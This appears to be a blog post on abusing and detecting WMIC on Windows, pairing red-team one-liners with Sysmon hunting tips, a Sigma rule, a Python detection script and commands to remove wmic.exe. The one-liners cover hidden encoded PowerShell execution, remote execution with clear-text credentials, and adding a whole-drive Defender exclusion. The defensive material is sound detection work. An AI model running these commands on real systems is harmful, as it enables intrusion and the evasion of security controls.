WMIC: The Forgotten Windows Admin Tool That Still Haunts Red Teams and Blue Teams in 2025

Understanding Windows Management Instrumentation Command-line (WMIC) and Why It Refuses to Die in Modern Cybersecurity

WMIC is deprecated but not dead. Attackers still love it because it's native, signed by Microsoft, rarely blocked, and can do almost anything WMI can do—quietly. Defenders hate it for exactly the same reasons.


What is WMIC, Really?

WMIC (Windows Management Instrumentation Command-line) is a command-line interface to WMI (Windows Management Instrumentation) that shipped with every Windows version from XP to Windows 11 24H2 (and Server 2025).

Even though Microsoft officially deprecated WMIC in Windows 10 1709 (2017) and started showing the “deprecated” banner, the binary (wmic.exe) is still present and fully functional in 2025 on all supported Windows versions unless manually removed.

It's a classic Living-Off-the-Land Binary (LOLBin).


Why Attackers Still Love WMIC in 2025

  • 100% native, Microsoft-signed → evades most application allowlisting (AppLocker, WDAC)
  • Can execute commands remotely (with creds)
  • Can query almost anything on a Windows system
  • Leaves very little forensic evidence compared to PowerShell
  • Often excluded from EDR telemetry collection rules (legacy exemptions)

Common Red Team One-Liners (2025 Edition)

1 Basic Local Process Execution (No PowerShell)

wmic process call create "calc.exe"
wmic process call create "powershell.exe -nop -w hidden -enc <base64>"

2 Remote Code Execution (with domain/admin creds)

wmic /node:"192.168.10.50" /user:"DOMAIN\admin" /password:"P@ssw0rd!" process call create "cmd.exe /c whoami > C:\temp\pwned.txt"

3 Remote Execution Against a Named Host (Lateral Movement). Note that despite the "WMI event subscription" framing this one-liner is often given, it is the same remote process call create as in #2 and creates no event subscription or persistence.

wmic /node:"TARGET01" /user:"DOMAIN\attacker" /password:"Secret123!" process call create "cmd /c powershell -enc <long-payload>"

4 Enumerate Local Administrators (Great for privilege auditing or hunting)

wmic path win32_groupuser where (GroupComponent="Win32_Group.Name=\"Administrators\"") | findstr /i "Administrator"

5 List Running Processes (Stealthier than tasklist in some EDRs)

wmic process get name,processid,commandline /format:list

6 Quietly Tamper With Windows Defender Preferences (needs admin). As written, this adds an exclusion for the whole of C:\ through the MSFT_MpPreference Add method and then forces a logoff (Win32Shutdown flag 4); it does not switch off real-time monitoring.

wmic /namespace:\\root\microsoft\windows\defender path MSFT_MpPreference call Add ExclusionPath="C:\" & wmic path Win32_OperatingSystem call Win32Shutdown 4

7 Pull BIOS Serial + UUID (Useful for asset tagging or loot)

wmic bios get serialnumber
wmic csproduct get uuid

Detection & Hunting Tips (Blue Team Side)

Technique → Detection method

  • WMIC process creation → Sysmon Event ID 1 with Image = wmic.exe and CommandLine contains process call create
  • Suspicious parent-child chain → Parent = cmd.exe → Child = wmic.exe → Grandchild = powershell.exe or cmd.exe
  • Remote WMIC execution → Event ID 5145 (Network Share Access) with object name containing ROOT\CIMV2, or Event ID 5859 (WMI activity)
  • Legacy telemetry gaps → many EDRs still exclude wmic.exe from command-line telemetry; enable command-line auditing (GPO: Advanced Audit Policy → Detailed Tracking → Process Creation)

Sigma Rule Example (Detect WMIC process creation abuse)

title: WMIC Process Creation Abuse
id: 764d100e-b334-4e1e-9c44-1b23f8616f21
status: experimental
description: Detects wmic.exe spawning a process via "process call create", locally or with /node against a remote host
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\wmic.exe'
    CommandLine|contains: 'process call create'
  condition: selection
falsepositives:
  - Legitimate admin scripts (rare in 2025)
level: high
tags:
  - attack.execution
  - attack.t1047
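The detection table and the Sigma rule above can be turned into runnable hunting logic. The script below is an added example, not code from the original post: it walks a handful of constructed Sysmon Event ID 1 records (field names follow Sysmon's schema, all values are invented), flags wmic.exe command lines containing process call create, /node: remote execution, a clear-text /password:, or the Defender namespace, and reconstructs the cmd.exe → wmic.exe → powershell.exe chain through ParentProcessId. matches_sigma_rule is the Python equivalent of the Sigma selection. The Finding type, the severity labels and the sample events are assumptions made for the demo.

```python
"""Hunting logic for the WMIC abuse patterns in the detection table and the Sigma rule.

Added example, not code from the original post. The Sysmon Event ID 1 records below are
constructed for the demo; field names follow Sysmon's schema, the values are invented.
"""
import re
from dataclasses import dataclass

# Constructed Sysmon EID 1 (process creation) records. A benign inventory query (pid 700)
# is included so the logic has something it must NOT flag.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe", "User": "CORP\\alice"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe", "User": "CORP\\alice"},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process call create "powershell.exe -nop -w hidden -enc QQBB"',
     "User": "CORP\\alice"},
    {"ProcessId": 400, "ParentProcessId": 300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBB", "User": "CORP\\alice"},
    {"ProcessId": 500, "ParentProcessId": 200, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic /node:"192.168.10.50" /user:"CORP\\admin" /password:"x" '
                    'process call create "cmd.exe /c whoami"',
     "User": "CORP\\alice"},
    {"ProcessId": 600, "ParentProcessId": 200, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic /namespace:\\\\root\\microsoft\\windows\\defender path MSFT_MpPreference "
                    "call Add ExclusionPath=C:\\",
     "User": "CORP\\alice"},
    {"ProcessId": 700, "ParentProcessId": 100, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic bios get serialnumber", "User": "CORP\\svc_inventory"},
]

# Grandchildren worth flagging under wmic.exe (from the parent-child row of the table)
SPAWN_CHILDREN = {"powershell.exe", "cmd.exe"}


@dataclass
class Finding:  # assumed shape for a hunting hit
    pid: int
    severity: str
    reason: str


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def _is_wmic(event: dict) -> bool:
    # Same test as the Sigma rule's Image|endswith: '\wmic.exe' (Sigma matching is case-insensitive)
    return _basename(event["Image"]) == "wmic.exe"


def matches_sigma_rule(event: dict) -> bool:
    """Python equivalent of the Sigma selection: wmic.exe plus 'process call create'."""
    cmd = re.sub(r"\s+", " ", event["CommandLine"].lower())
    return _is_wmic(event) and "process call create" in cmd


def _command_line_findings(event: dict) -> list:
    """Score one wmic.exe command line against the patterns in the one-liners above."""
    cmd = re.sub(r"\s+", " ", event["CommandLine"].lower())
    out = []
    if "process call create" in cmd:
        out.append(("high", "wmic process call create (process execution)"))
    if "/node:" in cmd:
        out.append(("high", "remote WMIC execution via /node:"))
    if "/password:" in cmd:
        out.append(("high", "clear-text credentials on the command line"))
    if "root\\microsoft\\windows\\defender" in cmd:
        out.append(("critical", "Defender namespace (MSFT_MpPreference) tampering"))
    return out


def hunt(events: list) -> list:
    """Return Findings for every wmic.exe process in a batch of Sysmon EID 1 records."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        if not _is_wmic(e):
            continue
        for severity, reason in _command_line_findings(e):
            findings.append(Finding(e["ProcessId"], severity, reason))
        # Parent/child chain from the table: cmd.exe -> wmic.exe -> powershell.exe | cmd.exe
        parent = by_pid.get(e["ParentProcessId"])
        if parent is not None and _basename(parent["Image"]) == "cmd.exe":
            for child in events:
                if child["ParentProcessId"] == e["ProcessId"] and _basename(child["Image"]) in SPAWN_CHILDREN:
                    findings.append(Finding(
                        e["ProcessId"], "critical",
                        f"chain cmd.exe -> wmic.exe -> {_basename(child['Image'])} (pid {child['ProcessId']})"))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid {f.pid:<4} {f.severity:<8} {f.reason}")
```

Against the sample batch this yields six findings on three processes: the local process call create plus its cmd → wmic → powershell chain, the remote /node: call (three hits, including the clear-text password), and the Defender namespace call; the inventory query from the service account produces nothing. In production the same functions would be fed from Sysmon or the 4688 process-creation events that the audit policy in the table enables, and the chain check needs the full batch, not one event at a time.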

How to Kill WMIC in Your Environment (If You Dare)

# Option 1: Delete the binary (breaks nothing in 2025 in the OS itself; inventory your own scripts and agents first)
# takeown makes the current admin the owner; the /grant is needed because Administrators
# only hold read/execute on System32 files by default, so del would otherwise fail
takeown /f C:\Windows\System32\wbem\wmic.exe
icacls C:\Windows\System32\wbem\wmic.exe /grant Administrators:F
icacls C:\Windows\System32\wbem\wmic.exe /deny Everyone:(X)
del /f /q C:\Windows\System32\wbem\wmic.exe
takeown /f C:\Windows\SysWOW64\wbem\wmic.exe
icacls C:\Windows\SysWOW64\wbem\wmic.exe /grant Administrators:F
del /f /q C:\Windows\SysWOW64\wbem\wmic.exe

# Option 2: AppLocker / WDAC rule
# Block executable: %SYSTEM32%\wbem\wmic.exe and %SYSWOW64%\wbem\wmic.exe

Note: PowerShell's Get-WmiObject / Invoke-WmiMethod were removed in PowerShell 7+. WMIC is one of the last built-in ways to abuse WMI from cmd.exe.


Final Verdict in 2025

WMIC is the cockroach of Windows LOLBins: deprecated, hated, but still crawling around corporate environments.
Red teams keep it in their back pocket because it still works everywhere.
Blue teams should treat any wmic process call create as malicious until proven otherwise.

Stay frosty.